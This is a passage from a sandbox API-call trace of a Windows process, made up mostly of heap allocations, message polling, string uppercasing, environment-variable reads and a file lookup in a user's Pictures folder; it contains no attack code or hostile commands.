Size=0xca) returned 0x2a7a350 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.876] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.876] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0211.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0211.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.878] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.878] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0211.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0211.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0211.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0211.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0211.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0211.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0211.881] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0211.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0211.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0211.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.883] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Wi_9DL5txr1IbTGlf8.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3689d1c0, ftCreationTime.dwHighDateTime=0x1d5d394, ftLastAccessTime.dwLowDateTime=0x33747c30, ftLastAccessTime.dwHighDateTime=0x1d5cf46, ftLastWriteTime.dwLowDateTime=0x33747c30, ftLastWriteTime.dwHighDateTime=0x1d5cf46, nFileSizeHigh=0x0, nFileSizeLow=0x51aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wi_9DL5txr1IbTGlf8.bmp", cAlternateFileName="WI_9DL~1.BMP")) returned 0x9e1d38 [0211.883] FindClose (in: hFindFile=0x9e1d38 | out: hFindFile=0x9e1d38) returned 1 [0211.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.884] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.884] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.884] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.884] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.884] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.884] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.884] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.884] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0211.884] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.884] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0211.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.885] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0211.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0211.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.885] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.885] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.886] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.886] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.886] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.886] WideCharToMultiByte (in: CodePage=0x0, 